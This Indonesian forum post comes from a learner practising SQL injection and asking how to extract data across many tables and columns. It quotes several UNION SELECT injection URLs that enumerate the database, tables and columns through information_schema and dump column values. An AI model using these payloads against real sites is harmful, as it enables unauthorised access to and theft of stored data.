mo tanya dong...
kebetulan lagi latihan SQLi
jadi ada beberapa langkah yg di cek...
database udah OK
table udah OK
column juga udah OK
cuma problemnya gimana cara generate untuk menghasilkan sesuatu...
misalnya gini...
database : main_db
table : tab_1, tab_2, tab_3
column : col_1, col_2, col_3 sampe 50 misalnya...
trus gimana caranya buat generate ?
buat db pake command :
Code: Select all
http://www.example.com/index.php?id=-3+UNION+SELECT+concat(database()),2,3,4,5,6,7--
Code: Select all
http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database()--
Code: Select all
http://www.example.com/index.php?id=-3 union select group_concat(column_name),2,3,4,5,6,7 from information_schema.columns where table_schema=database()--
kalo menurut tutorial caranya :
Code: Select all
http://www.example.com/index.php?id=-3 union select 1,group_concat(Columnname,0x3a,columnname,0x3a),2,3,4,5,6,7 from databasename.tablename--
trus tablenamenya apa ? kan tadi ada tab 1 sampe 3.. kalo banyak gimana ??
gimana tuh.. ada yg bisa tolongin ??